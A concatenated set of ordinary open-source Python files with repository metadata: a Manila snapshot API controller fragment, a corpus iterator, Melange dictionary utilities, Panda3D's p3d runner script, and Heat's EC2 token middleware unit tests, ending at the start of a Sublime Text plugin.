share = self.share_api.get(context, share_id)
# Verify that share can be snapshotted
if not share['snapshot_support']:
msg = _("Snapshot cannot be created from share '%s', because "
"share back end does not support it.") % share_id
LOG.error(msg)
raise exc.HTTPUnprocessableEntity(msg)
LOG.info(_LI("Create snapshot from share %s"),
share_id, context=context)
# NOTE(rushiagr): v2 API allows name instead of display_name
if 'name' in snapshot:
snapshot['display_name'] = snapshot.get('name')
del snapshot['name']
# NOTE(rushiagr): v2 API allows description instead of
# display_description
if 'description' in snapshot:
snapshot['display_description'] = snapshot.get('description')
del snapshot['description']
new_snapshot = self.share_api.create_snapshot(
context,
share,
snapshot.get('display_name'),
snapshot.get('display_description'))
return self._view_builder.detail(
req, dict(six.iteritems(new_snapshot)))
def create_resource():
return wsgi.Resource(ShareSnapshotsController())
| {
"content_hash": "d199986592a0c2731363c1465eb1a083",
"timestamp": "",
"source": "github",
"line_count": 169,
"max_line_length": 75,
"avg_line_length": 33.798816568047336,
"alnum_prop": 0.5948879551820728,
"repo_name": "jcsp/manila",
"id": "c5b9acf98af7685c452447178b7f3bd363559815",
"size": "6334",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "manila/api/v1/share_snapshots.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Mako",
"bytes": "953"
},
{
"name": "Python",
"bytes": "4993686"
},
{
"name": "Shell",
"bytes": "42913"
}
],
"symlink_target": ""
} |
import os
class Articles(object):
def __init__(self, corpus):
self.corpus = corpus
self.index = dict()
self.articles_count = 0
self.docs_count = 0
def __iter__(self):
corpus = self.corpus
for sub in os.listdir(corpus):
subdir = os.path.join(corpus, sub)
for fname in os.listdir(subdir):
article_id = fname[:-4]
paragraphs_count =0
for line in open(os.path.join(subdir, fname)):
paragraphs_count +=1
self.docs_count += 1
yield line
self.index[str(self.docs_count)] = str(article_id)+'_'+str(paragraphs_count)
self.articles_count += 1
def print_stats(self):
print 'number of articles: ', self.articles_count
print 'number of docs: ', self.docs_count
class Mapper():
def __init__(self, corpus):
self.corpus = corpus
self.articles = dict()
for sub in os.listdir(self.corpus):
subdir = os.path.join(self.corpus, sub)
for fname in os.listdir(subdir):
for i, line in enumerate(open(os.path.join(subdir, fname))):
if i == 0:
self.articles[fname[:-4]] = line
break
def get_title(self, article_id):
return self.articles[article_id]
| {
"content_hash": "eaa59083b3e13fb44de4538c530c564f",
"timestamp": "",
"source": "github",
"line_count": 41,
"max_line_length": 81,
"avg_line_length": 27.4390243902439,
"alnum_prop": 0.6524444444444445,
"repo_name": "natsheh/semantic_query",
"id": "affc657836f344a1e9dc6609f5dbe2e53b4dc934",
"size": "1480",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "utils/load.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "13864"
}
],
"symlink_target": ""
} |
"""Logic related to handling dictionaries.
"""
__authors__ = [
'"Sverre Rabbelier" <[email protected]>',
'"Lennard de Rijk" <[email protected]>',
]
from google.appengine.ext import db
import datetime
DICT_TYPES = (db.StringProperty, db.IntegerProperty)
STR_TYPES = (datetime.datetime)
def filter(target, keys):
"""Filters a dictonary to only allow items with the given keys.
Args:
target: The dictionary that is to be filtered
keys: The list with keys to filter the dictionary on
Returns:
A dictionary that only contains the (key,value) from target that
have their key in keys.
"""
result = {}
for key, value in target.iteritems():
if key in keys:
result[key] = value
return result
def merge(target, updates, sub_merge=False, recursive=False):
"""Like the builtin 'update' method but does not overwrite existing values.
Args:
target: The dictionary that is to be updated, may be None
updates: A dictionary containing new values for the original dict
sub_merge: Merge a dict or list present in both target and update
recursive: Determines whether merge_subdicts is recursive
Returns:
a new dict, with any missing values from updates merged into target
"""
target = target.copy() if target else {}
for key, value in updates.iteritems():
if key not in target:
target[key] = value
elif sub_merge:
target_value = target[key]
# try to merge dicts
if isinstance(value, dict) and isinstance(target_value, dict):
# the merge becomes recursive by specifying it not only as value
# to sub_merge but also to recursive
target[key] = merge(target_value, value,
sub_merge=recursive, recursive=recursive)
# try to merge lists
if isinstance(value, list) and isinstance(target_value, list):
target[key] = target_value + value
return target
def zip(keys, values):
"""Returns a dict containing keys with values.
If there are more items in keys than in values, None will be used.
If there are more items in values than in keys, they will be ignored.
Args:
keys: the keys for the dictionary
values: the values for the dictionary
"""
result = {}
size = len(keys)
for i in range(size):
if i < len(values):
value = values[i]
else:
value = None
key = keys[i]
result[key] = value
return result
def unzip(target, order):
"""Constructs a list from target in the order specified by order.
Args:
target: the dictionary to pull the values from
order: the order of the keys
"""
return (target[key] for key in order)
def rename(target, keys):
"""Returns a dict containing only the key/value pairs from keys.
The keys from target will be looked up in keys, and the corresponding
value from keys will be used instead. If a key is not found, it is skipped.
Args:
target: the dictionary to filter
keys: the fields to filter
"""
result = {}
for key, value in target.iteritems():
if key in keys:
new_key = keys[key]
result[new_key] = value
return result
def split(target):
"""Takes a dictionary and splits it into single-valued dicts.
If there are any values in target that are a list it is split up
into a new dictionary instead.
>>> split({})
[{}]
>>> split({'foo':'bar'})
[{'foo': 'bar'}]
>>> split({'foo':'bar', 'bar':'baz'})
[{'foo': 'bar', 'bar': 'baz'}]
>>> split({'foo':'bar', 'bar':['one', 'two']})
[{'foo': 'bar', 'bar': 'one'}, {'foo': 'bar', 'bar': 'two'}]
>>> split({'foo':'bar', 'bar':['one', 'two'], 'baz': ['three', 'four']})
[{'bar': 'one', 'foo': 'bar', 'baz': 'three'},
{'bar': 'two', 'foo': 'bar', 'baz': 'three'},
{'bar': 'one', 'foo': 'bar', 'baz': 'four'},
{'bar': 'two', 'foo': 'bar', 'baz': 'four'}]
"""
result = [{}]
for key, values in target.iteritems():
# Make the value a list if it's not
if not isinstance(values, list):
values = [values]
tmpresult = []
# Iterate over all we gathered so far
for current_filter in result:
for value in values:
# Create a new dict from the current filter
newdict = dict(current_filter)
# And create a new dict that also has the current key/value pair
newdict[key] = value
tmpresult.append(newdict)
# Update the result for the next iteration
result = tmpresult
return result
def groupby(target, group_key):
"""Groups a list of dictionaries by group_key.
"""
result = {}
for value in target:
key_value = value[group_key]
if not key_value in result:
result[key_value] = []
result[key_value].append(value)
return result
def groupDictBy(target, key, new_key=None):
"""Groups a dictionary by a key.
"""
if not new_key:
new_key = key
result = ((k, v[new_key]) for k, v in target.iteritems() if v[key])
return dict(result)
def identity(target):
"""Returns a dictionary with the values equal to the keys.
"""
result = ((i, i) for i in target)
return dict(result)
def format(target, input):
"""Returns a dictionary with the values formatted with input.
"""
result = ((k, v % input) for k, v in target.iteritems())
return dict(result)
def containsAll(target, keys):
"""Returns true iff target contains all keys.
"""
result = ((i in target) for i in keys)
return all(result)
def toDict(entity, field_names=None):
"""Returns a dict with all specified values of this entity.
Args:
entity: entity to be put in a dictionary
field_names: the fields that should be included, defaults to
all fields that are of a type that is in DICT_TYPES.
"""
result = {}
if not field_names:
props = entity.properties().iteritems()
field_names = [k for k, v in props if isinstance(v, DICT_TYPES)]
for key in field_names:
# Skip everything that is not valid
if not hasattr(entity, key):
continue
value = getattr(entity, key)
if callable(value):
value = value()
if isinstance(value, STR_TYPES):
value = str(value)
result[key] = value
return result
def cleanDict(target, filter_fields, escape_safe=False):
"""Returns a version of target with all specified fields html escaped
Args:
target: the dictionary that should be escaped
filter_fields: the fields that should be escaped
escape_false: also escape fields marked as safe
"""
from django.utils.html import escape
from django.utils.safestring import SafeData
result = target.copy()
for field in filter_fields:
data = result[field]
if not data or (not escape_safe and isinstance(data, SafeData)):
continue
result[field] = escape(data)
return result
| {
"content_hash": "a4ea01cd301466967a53ed27b1686a94",
"timestamp": "",
"source": "github",
"line_count": 283,
"max_line_length": 77,
"avg_line_length": 23.996466431095406,
"alnum_prop": 0.6457075541157414,
"repo_name": "MatthewWilkes/mw4068-packaging",
"id": "1fb369ed76c1c04704d58aee0d62c813580340cd",
"size": "7401",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "src/melange/src/soc/logic/dicts.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "68827"
},
{
"name": "HTML",
"bytes": "586705"
},
{
"name": "JavaScript",
"bytes": "441502"
},
{
"name": "Python",
"bytes": "2136551"
},
{
"name": "Shell",
"bytes": "5667"
}
],
"symlink_target": ""
} |
"""
This tool will invoke the AppRunner to execute a packaged p3d
application. It requires that that the current Panda3D and Python
versions match the version expected by the application.
Normally, you do not need to use this tool; instead, use the provided
standalone panda3d executable to invoke any p3d application. Using
panda3d will guarantee that the correct versions of Panda3D and Python
are used to run the application. However, there may be occasions when
it is useful to use this tool to run the application with the current
build instead of with its advertised version requirements.
Usage:
runp3d.py app.p3d [args]
The command-line arguments following the application name are passed
into the application unchanged.
See pack3d.p3d for an application that generates these p3d files.
"""
import sys
import getopt
from AppRunner import AppRunner, ArgumentError
from direct.task.TaskManagerGlobal import taskMgr
from pandac.PandaModules import Filename
def parseSysArgs():
""" Handles sys.argv, if there are any local arguments, and
returns a new argv suitable for passing into the
application. """
# We prefix a "+" sign, following the GNU convention, to tell
# getopt not to parse options following the first non-option
# parameter.
opts, args = getopt.getopt(sys.argv[1:], '+h')
for option, value in opts:
if option == '-h':
print __doc__
sys.exit(1)
if not args or not args[0]:
raise ArgumentError, "No Panda app specified. Use:\nrunp3d.py app.p3d"
arg0 = args[0]
p3dFilename = Filename.fromOsSpecific(arg0)
if p3dFilename.exists():
p3dFilename.makeAbsolute()
arg0 = p3dFilename.toOsSpecific()
return [arg0] + args[1:]
def runPackedApp(pathname):
runner = AppRunner()
runner.gotWindow = True
try:
runner.setP3DFilename(pathname, tokens = [], argv = [],
instanceId = 0, interactiveConsole = False)
except ArgumentError, e:
print e.args[0]
sys.exit(1)
if __name__ == '__main__':
runner = AppRunner()
runner.gotWindow = True
try:
argv = parseSysArgs()
runner.setP3DFilename(argv[0], tokens = [], argv = argv,
instanceId = 0, interactiveConsole = False)
except ArgumentError, e:
print e.args[0]
sys.exit(1)
taskMgr.run()
| {
"content_hash": "387569986349172fce37438f06d684da",
"timestamp": "",
"source": "github",
"line_count": 77,
"max_line_length": 79,
"avg_line_length": 31.31168831168831,
"alnum_prop": 0.6789713811696392,
"repo_name": "ToonTownInfiniteRepo/ToontownInfinite",
"id": "a7807de332f34f90d989c00fa82731520eb7b1c3",
"size": "2435",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "Panda3D-1.9.0/direct/p3d/runp3d.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "1703277"
},
{
"name": "C#",
"bytes": "9892"
},
{
"name": "C++",
"bytes": "5468044"
},
{
"name": "Emacs Lisp",
"bytes": "210083"
},
{
"name": "F#",
"bytes": "4611"
},
{
"name": "JavaScript",
"bytes": "7003"
},
{
"name": "Objective-C",
"bytes": "23212"
},
{
"name": "Puppet",
"bytes": "5245"
},
{
"name": "Python",
"bytes": "34010215"
},
{
"name": "Shell",
"bytes": "11192"
},
{
"name": "Tcl",
"bytes": "1981257"
}
],
"symlink_target": ""
} |
import json
from oslo_config import cfg
from oslo_utils import importutils
import requests
import six
from heat.api.aws import ec2token
from heat.api.aws import exception
from heat.common import wsgi
from heat.tests import common
class Ec2TokenTest(common.HeatTestCase):
'''
Tests the Ec2Token middleware
'''
def setUp(self):
super(Ec2TokenTest, self).setUp()
self.m.StubOutWithMock(requests, 'post')
def _dummy_GET_request(self, params=None, environ=None):
# Mangle the params dict into a query string
params = params or {}
environ = environ or {}
qs = "&".join(["=".join([k, str(params[k])]) for k in params])
environ.update({'REQUEST_METHOD': 'GET', 'QUERY_STRING': qs})
req = wsgi.Request(environ)
return req
def test_conf_get_paste(self):
dummy_conf = {'auth_uri': 'http://192.0.2.9/v2.0'}
ec2 = ec2token.EC2Token(app=None, conf=dummy_conf)
self.assertEqual('http://192.0.2.9/v2.0', ec2._conf_get('auth_uri'))
self.assertEqual(
'http://192.0.2.9/v2.0/ec2tokens',
ec2._conf_get_keystone_ec2_uri('http://192.0.2.9/v2.0'))
def test_conf_get_opts(self):
cfg.CONF.set_default('auth_uri', 'http://192.0.2.9/v2.0/',
group='ec2authtoken')
ec2 = ec2token.EC2Token(app=None, conf={})
self.assertEqual('http://192.0.2.9/v2.0/', ec2._conf_get('auth_uri'))
self.assertEqual(
'http://192.0.2.9/v2.0/ec2tokens',
ec2._conf_get_keystone_ec2_uri('http://192.0.2.9/v2.0/'))
def test_conf_get_ssl_default_options(self):
ec2 = ec2token.EC2Token(app=None, conf={})
self.assertTrue(ec2.ssl_options['verify'],
"SSL verify should be True by default")
self.assertIsNone(ec2.ssl_options['cert'],
"SSL client cert should be None by default")
def test_conf_ssl_insecure_option(self):
ec2 = ec2token.EC2Token(app=None, conf={})
cfg.CONF.set_default('insecure', 'True', group='ec2authtoken')
cfg.CONF.set_default('ca_file', None, group='ec2authtoken')
self.assertFalse(ec2.ssl_options['verify'])
def test_conf_get_ssl_opts(self):
cfg.CONF.set_default('auth_uri', 'https://192.0.2.9/v2.0/',
group='ec2authtoken')
cfg.CONF.set_default('ca_file', '/home/user/cacert.pem',
group='ec2authtoken')
cfg.CONF.set_default('insecure', 'false', group='ec2authtoken')
cfg.CONF.set_default('cert_file', '/home/user/mycert',
group='ec2authtoken')
cfg.CONF.set_default('key_file', '/home/user/mykey',
group='ec2authtoken')
ec2 = ec2token.EC2Token(app=None, conf={})
self.assertEqual('/home/user/cacert.pem', ec2.ssl_options['verify'])
self.assertEqual(('/home/user/mycert', '/home/user/mykey'),
ec2.ssl_options['cert'])
def test_get_signature_param_old(self):
params = {'Signature': 'foo'}
dummy_req = self._dummy_GET_request(params)
ec2 = ec2token.EC2Token(app=None, conf={})
self.assertEqual('foo', ec2._get_signature(dummy_req))
def test_get_signature_param_new(self):
params = {'X-Amz-Signature': 'foo'}
dummy_req = self._dummy_GET_request(params)
ec2 = ec2token.EC2Token(app=None, conf={})
self.assertEqual('foo', ec2._get_signature(dummy_req))
def test_get_signature_header_space(self):
req_env = {'HTTP_AUTHORIZATION':
('Authorization: foo Credential=foo/bar, '
'SignedHeaders=content-type;host;x-amz-date, '
'Signature=xyz')}
dummy_req = self._dummy_GET_request(environ=req_env)
ec2 = ec2token.EC2Token(app=None, conf={})
self.assertEqual('xyz', ec2._get_signature(dummy_req))
def test_get_signature_header_notlast(self):
req_env = {'HTTP_AUTHORIZATION':
('Authorization: foo Credential=foo/bar, '
'Signature=xyz,'
'SignedHeaders=content-type;host;x-amz-date ')}
dummy_req = self._dummy_GET_request(environ=req_env)
ec2 = ec2token.EC2Token(app=None, conf={})
self.assertEqual('xyz', ec2._get_signature(dummy_req))
def test_get_signature_header_nospace(self):
req_env = {'HTTP_AUTHORIZATION':
('Authorization: foo Credential=foo/bar,'
'SignedHeaders=content-type;host;x-amz-date,'
'Signature=xyz')}
dummy_req = self._dummy_GET_request(environ=req_env)
ec2 = ec2token.EC2Token(app=None, conf={})
self.assertEqual('xyz', ec2._get_signature(dummy_req))
def test_get_access_param_old(self):
params = {'AWSAccessKeyId': 'foo'}
dummy_req = self._dummy_GET_request(params)
ec2 = ec2token.EC2Token(app=None, conf={})
self.assertEqual('foo', ec2._get_access(dummy_req))
def test_get_access_param_new(self):
params = {'X-Amz-Credential': 'foo/bar'}
dummy_req = self._dummy_GET_request(params)
ec2 = ec2token.EC2Token(app=None, conf={})
self.assertEqual('foo', ec2._get_access(dummy_req))
def test_get_access_header_space(self):
req_env = {'HTTP_AUTHORIZATION':
('Authorization: foo Credential=foo/bar, '
'SignedHeaders=content-type;host;x-amz-date, '
'Signature=xyz')}
dummy_req = self._dummy_GET_request(environ=req_env)
ec2 = ec2token.EC2Token(app=None, conf={})
self.assertEqual('foo', ec2._get_access(dummy_req))
def test_get_access_header_nospace(self):
req_env = {'HTTP_AUTHORIZATION':
('Authorization: foo Credential=foo/bar,'
'SignedHeaders=content-type;host;x-amz-date,'
'Signature=xyz')}
dummy_req = self._dummy_GET_request(environ=req_env)
ec2 = ec2token.EC2Token(app=None, conf={})
self.assertEqual('foo', ec2._get_access(dummy_req))
def test_get_access_header_last(self):
req_env = {'HTTP_AUTHORIZATION':
('Authorization: foo '
'SignedHeaders=content-type;host;x-amz-date,'
'Signature=xyz,Credential=foo/bar')}
dummy_req = self._dummy_GET_request(environ=req_env)
ec2 = ec2token.EC2Token(app=None, conf={})
self.assertEqual('foo', ec2._get_access(dummy_req))
def test_call_x_auth_user(self):
req_env = {'HTTP_X_AUTH_USER': 'foo'}
dummy_req = self._dummy_GET_request(environ=req_env)
ec2 = ec2token.EC2Token(app='xyz', conf={})
self.assertEqual('xyz', ec2.__call__(dummy_req))
def test_call_auth_nosig(self):
req_env = {'HTTP_AUTHORIZATION':
('Authorization: foo Credential=foo/bar, '
'SignedHeaders=content-type;host;x-amz-date')}
dummy_req = self._dummy_GET_request(environ=req_env)
ec2 = ec2token.EC2Token(app='xyz', conf={})
self.assertRaises(exception.HeatIncompleteSignatureError,
ec2.__call__, dummy_req)
def test_call_auth_nouser(self):
req_env = {'HTTP_AUTHORIZATION':
('Authorization: foo '
'SignedHeaders=content-type;host;x-amz-date,'
'Signature=xyz')}
dummy_req = self._dummy_GET_request(environ=req_env)
ec2 = ec2token.EC2Token(app='xyz', conf={})
self.assertRaises(exception.HeatMissingAuthenticationTokenError,
ec2.__call__, dummy_req)
def test_call_auth_noaccess(self):
# If there's no accesskey in params or header, but there is a
# Signature, we expect HeatMissingAuthenticationTokenError
params = {'Signature': 'foo'}
dummy_req = self._dummy_GET_request(params)
ec2 = ec2token.EC2Token(app='xyz', conf={})
self.assertRaises(exception.HeatMissingAuthenticationTokenError,
ec2.__call__, dummy_req)
def test_call_x_auth_nouser_x_auth_user(self):
req_env = {'HTTP_X_AUTH_USER': 'foo',
'HTTP_AUTHORIZATION':
('Authorization: foo '
'SignedHeaders=content-type;host;x-amz-date,'
'Signature=xyz')}
dummy_req = self._dummy_GET_request(environ=req_env)
ec2 = ec2token.EC2Token(app='xyz', conf={})
self.assertEqual('xyz', ec2.__call__(dummy_req))
def _stub_http_connection(self, headers=None, params=None, response=None,
req_url='http://123:5000/v2.0/ec2tokens',
verify=True, cert=None):
headers = headers or {}
params = params or {}
class DummyHTTPResponse(object):
text = response
def json(self):
return json.loads(self.text)
body_hash = ('e3b0c44298fc1c149afbf4c8996fb9'
'2427ae41e4649b934ca495991b7852b855')
req_creds = json.dumps({"ec2Credentials":
{"access": "foo",
"headers": headers,
"host": "heat:8000",
"verb": "GET",
"params": params,
"signature": "xyz",
"path": "/v1",
"body_hash": body_hash}})
req_headers = {'Content-Type': 'application/json'}
requests.post(req_url, data=req_creds, verify=verify, cert=cert,
headers=req_headers).AndReturn(DummyHTTPResponse())
def test_call_ok(self):
dummy_conf = {'auth_uri': 'http://123:5000/v2.0'}
ec2 = ec2token.EC2Token(app='woot', conf=dummy_conf)
auth_str = ('Authorization: foo Credential=foo/bar, '
'SignedHeaders=content-type;host;x-amz-date, '
'Signature=xyz')
req_env = {'SERVER_NAME': 'heat',
'SERVER_PORT': '8000',
'PATH_INFO': '/v1',
'HTTP_AUTHORIZATION': auth_str}
dummy_req = self._dummy_GET_request(environ=req_env)
ok_resp = json.dumps({'access': {'token': {
'id': 123,
'tenant': {'name': 'tenant', 'id': 'abcd1234'}}}})
self._stub_http_connection(headers={'Authorization': auth_str},
response=ok_resp)
self.m.ReplayAll()
self.assertEqual('woot', ec2.__call__(dummy_req))
self.assertEqual('tenant', dummy_req.headers['X-Tenant-Name'])
self.assertEqual('abcd1234', dummy_req.headers['X-Tenant-Id'])
self.m.VerifyAll()
def test_call_ok_roles(self):
dummy_conf = {'auth_uri': 'http://123:5000/v2.0'}
ec2 = ec2token.EC2Token(app='woot', conf=dummy_conf)
auth_str = ('Authorization: foo Credential=foo/bar, '
'SignedHeaders=content-type;host;x-amz-date, '
'Signature=xyz')
req_env = {'SERVER_NAME': 'heat',
'SERVER_PORT': '8000',
'PATH_INFO': '/v1',
'HTTP_AUTHORIZATION': auth_str}
dummy_req = self._dummy_GET_request(environ=req_env)
ok_resp = json.dumps({'access': {
'token': {
'id': 123,
'tenant': {'name': 'tenant', 'id': 'abcd1234'}
},
'metadata': {'roles': ['aa', 'bb', 'cc']}}})
self._stub_http_connection(headers={'Authorization': auth_str},
response=ok_resp)
self.m.ReplayAll()
self.assertEqual('woot', ec2.__call__(dummy_req))
self.assertEqual('aa,bb,cc', dummy_req.headers['X-Roles'])
self.m.VerifyAll()
def test_call_err_tokenid(self):
dummy_conf = {'auth_uri': 'http://123:5000/v2.0/'}
ec2 = ec2token.EC2Token(app='woot', conf=dummy_conf)
auth_str = ('Authorization: foo Credential=foo/bar, '
'SignedHeaders=content-type;host;x-amz-date, '
'Signature=xyz')
req_env = {'SERVER_NAME': 'heat',
'SERVER_PORT': '8000',
'PATH_INFO': '/v1',
'HTTP_AUTHORIZATION': auth_str}
dummy_req = self._dummy_GET_request(environ=req_env)
err_msg = "EC2 access key not found."
err_resp = json.dumps({'error': {'message': err_msg}})
self._stub_http_connection(headers={'Authorization': auth_str},
response=err_resp)
self.m.ReplayAll()
self.assertRaises(exception.HeatInvalidClientTokenIdError,
ec2.__call__, dummy_req)
self.m.VerifyAll()
def test_call_err_signature(self):
dummy_conf = {'auth_uri': 'http://123:5000/v2.0'}
ec2 = ec2token.EC2Token(app='woot', conf=dummy_conf)
auth_str = ('Authorization: foo Credential=foo/bar, '
'SignedHeaders=content-type;host;x-amz-date, '
'Signature=xyz')
req_env = {'SERVER_NAME': 'heat',
'SERVER_PORT': '8000',
'PATH_INFO': '/v1',
'HTTP_AUTHORIZATION': auth_str}
dummy_req = self._dummy_GET_request(environ=req_env)
err_msg = "EC2 signature not supplied."
err_resp = json.dumps({'error': {'message': err_msg}})
self._stub_http_connection(headers={'Authorization': auth_str},
response=err_resp)
self.m.ReplayAll()
self.assertRaises(exception.HeatSignatureError,
ec2.__call__, dummy_req)
self.m.VerifyAll()
def test_call_err_denied(self):
dummy_conf = {'auth_uri': 'http://123:5000/v2.0'}
ec2 = ec2token.EC2Token(app='woot', conf=dummy_conf)
auth_str = ('Authorization: foo Credential=foo/bar, '
'SignedHeaders=content-type;host;x-amz-date, '
'Signature=xyz')
req_env = {'SERVER_NAME': 'heat',
'SERVER_PORT': '8000',
'PATH_INFO': '/v1',
'HTTP_AUTHORIZATION': auth_str}
dummy_req = self._dummy_GET_request(environ=req_env)
err_resp = json.dumps({})
self._stub_http_connection(headers={'Authorization': auth_str},
response=err_resp)
self.m.ReplayAll()
self.assertRaises(exception.HeatAccessDeniedError,
ec2.__call__, dummy_req)
self.m.VerifyAll()
def test_call_ok_v2(self):
dummy_conf = {'auth_uri': 'http://123:5000/v2.0'}
ec2 = ec2token.EC2Token(app='woot', conf=dummy_conf)
params = {'AWSAccessKeyId': 'foo', 'Signature': 'xyz'}
req_env = {'SERVER_NAME': 'heat',
'SERVER_PORT': '8000',
'PATH_INFO': '/v1'}
dummy_req = self._dummy_GET_request(params, req_env)
ok_resp = json.dumps({'access': {'metadata': {}, 'token': {
'id': 123,
'tenant': {'name': 'tenant', 'id': 'abcd1234'}}}})
self._stub_http_connection(response=ok_resp,
params={'AWSAccessKeyId': 'foo'})
self.m.ReplayAll()
self.assertEqual('woot', ec2.__call__(dummy_req))
self.m.VerifyAll()
def test_call_ok_multicloud(self):
dummy_conf = {
'allowed_auth_uris': [
'http://123:5000/v2.0', 'http://456:5000/v2.0'],
'multi_cloud': True
}
ec2 = ec2token.EC2Token(app='woot', conf=dummy_conf)
params = {'AWSAccessKeyId': 'foo', 'Signature': 'xyz'}
req_env = {'SERVER_NAME': 'heat',
'SERVER_PORT': '8000',
'PATH_INFO': '/v1'}
dummy_req = self._dummy_GET_request(params, req_env)
ok_resp = json.dumps({'access': {'metadata': {}, 'token': {
'id': 123,
'tenant': {'name': 'tenant', 'id': 'abcd1234'}}}})
err_msg = "EC2 access key not found."
err_resp = json.dumps({'error': {'message': err_msg}})
# first request fails
self._stub_http_connection(
req_url='http://123:5000/v2.0/ec2tokens',
response=err_resp,
params={'AWSAccessKeyId': 'foo'})
# second request passes
self._stub_http_connection(
req_url='http://456:5000/v2.0/ec2tokens',
response=ok_resp,
params={'AWSAccessKeyId': 'foo'})
self.m.ReplayAll()
self.assertEqual('woot', ec2.__call__(dummy_req))
self.m.VerifyAll()
def test_call_err_multicloud(self):
dummy_conf = {
'allowed_auth_uris': [
'http://123:5000/v2.0', 'http://456:5000/v2.0'],
'multi_cloud': True
}
ec2 = ec2token.EC2Token(app='woot', conf=dummy_conf)
params = {'AWSAccessKeyId': 'foo', 'Signature': 'xyz'}
req_env = {'SERVER_NAME': 'heat',
'SERVER_PORT': '8000',
'PATH_INFO': '/v1'}
dummy_req = self._dummy_GET_request(params, req_env)
err_resp1 = json.dumps({})
err_msg2 = "EC2 access key not found."
err_resp2 = json.dumps({'error': {'message': err_msg2}})
# first request fails with HeatAccessDeniedError
self._stub_http_connection(
req_url='http://123:5000/v2.0/ec2tokens',
response=err_resp1,
params={'AWSAccessKeyId': 'foo'})
# second request fails with HeatInvalidClientTokenIdError
self._stub_http_connection(
req_url='http://456:5000/v2.0/ec2tokens',
response=err_resp2,
params={'AWSAccessKeyId': 'foo'})
self.m.ReplayAll()
# raised error matches last failure
self.assertRaises(exception.HeatInvalidClientTokenIdError,
ec2.__call__, dummy_req)
self.m.VerifyAll()
def test_call_err_multicloud_none_allowed(self):
dummy_conf = {
'allowed_auth_uris': [],
'multi_cloud': True
}
ec2 = ec2token.EC2Token(app='woot', conf=dummy_conf)
params = {'AWSAccessKeyId': 'foo', 'Signature': 'xyz'}
req_env = {'SERVER_NAME': 'heat',
'SERVER_PORT': '8000',
'PATH_INFO': '/v1'}
dummy_req = self._dummy_GET_request(params, req_env)
self.m.ReplayAll()
self.assertRaises(exception.HeatAccessDeniedError,
ec2.__call__, dummy_req)
self.m.VerifyAll()
def test_call_badconf_no_authuri(self):
ec2 = ec2token.EC2Token(app='woot', conf={})
params = {'AWSAccessKeyId': 'foo', 'Signature': 'xyz'}
req_env = {'SERVER_NAME': 'heat',
'SERVER_PORT': '8000',
'PATH_INFO': '/v1'}
dummy_req = self._dummy_GET_request(params, req_env)
self.m.ReplayAll()
ex = self.assertRaises(exception.HeatInternalFailureError,
ec2.__call__, dummy_req)
self.assertEqual('Service misconfigured', six.text_type(ex))
self.m.VerifyAll()
def test_call_ok_auth_uri_ec2authtoken(self):
dummy_url = 'http://123:5000/v2.0'
cfg.CONF.set_default('auth_uri', dummy_url, group='ec2authtoken')
ec2 = ec2token.EC2Token(app='woot', conf={})
params = {'AWSAccessKeyId': 'foo', 'Signature': 'xyz'}
req_env = {'SERVER_NAME': 'heat',
'SERVER_PORT': '8000',
'PATH_INFO': '/v1'}
dummy_req = self._dummy_GET_request(params, req_env)
ok_resp = json.dumps({'access': {'metadata': {}, 'token': {
'id': 123,
'tenant': {'name': 'tenant', 'id': 'abcd1234'}}}})
self._stub_http_connection(response=ok_resp,
params={'AWSAccessKeyId': 'foo'})
self.m.ReplayAll()
self.assertEqual('woot', ec2.__call__(dummy_req))
self.m.VerifyAll()
def test_call_ok_auth_uri_ec2authtoken_long(self):
# Prove we tolerate a url which already includes the /ec2tokens path
dummy_url = 'http://123:5000/v2.0/ec2tokens'
cfg.CONF.set_default('auth_uri', dummy_url, group='ec2authtoken')
ec2 = ec2token.EC2Token(app='woot', conf={})
params = {'AWSAccessKeyId': 'foo', 'Signature': 'xyz'}
req_env = {'SERVER_NAME': 'heat',
'SERVER_PORT': '8000',
'PATH_INFO': '/v1'}
dummy_req = self._dummy_GET_request(params, req_env)
ok_resp = json.dumps({'access': {'metadata': {}, 'token': {
'id': 123,
'tenant': {'name': 'tenant', 'id': 'abcd1234'}}}})
self._stub_http_connection(response=ok_resp,
params={'AWSAccessKeyId': 'foo'})
self.m.ReplayAll()
self.assertEqual('woot', ec2.__call__(dummy_req))
self.m.VerifyAll()
def test_call_ok_auth_uri_ks_authtoken(self):
# Import auth_token to have keystone_authtoken settings setup.
importutils.import_module('keystonemiddleware.auth_token')
dummy_url = 'http://123:5000/v2.0'
cfg.CONF.set_override('auth_uri', dummy_url,
group='keystone_authtoken')
ec2 = ec2token.EC2Token(app='woot', conf={})
params = {'AWSAccessKeyId': 'foo', 'Signature': 'xyz'}
req_env = {'SERVER_NAME': 'heat',
'SERVER_PORT': '8000',
'PATH_INFO': '/v1'}
dummy_req = self._dummy_GET_request(params, req_env)
ok_resp = json.dumps({'access': {'metadata': {}, 'token': {
'id': 123,
'tenant': {'name': 'tenant', 'id': 'abcd1234'}}}})
self._stub_http_connection(response=ok_resp,
params={'AWSAccessKeyId': 'foo'})
self.m.ReplayAll()
self.assertEqual('woot', ec2.__call__(dummy_req))
self.m.VerifyAll()
def test_filter_factory(self):
ec2_filter = ec2token.EC2Token_filter_factory(global_conf={})
self.assertEqual('xyz', ec2_filter('xyz').application)
def test_filter_factory_none_app(self):
ec2_filter = ec2token.EC2Token_filter_factory(global_conf={})
self.assertEqual(None, ec2_filter(None).application)
| {
"content_hash": "5908281b74b076c2e8dcc03f99de4eea",
"timestamp": "",
"source": "github",
"line_count": 546,
"max_line_length": 77,
"avg_line_length": 41.556776556776555,
"alnum_prop": 0.5415601586602027,
"repo_name": "rdo-management/heat",
"id": "006dc1f922b7e5a60e5a64ba829b1a6c2d84e3a1",
"size": "23266",
"binary": false,
"copies": "3",
"ref": "refs/heads/mgt-master",
"path": "heat/tests/test_api_ec2token.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "5970886"
},
{
"name": "Shell",
"bytes": "25070"
}
],
"symlink_target": ""
} |
import sublime
import sublime_plugin
import re
PATTERN = re.compile(
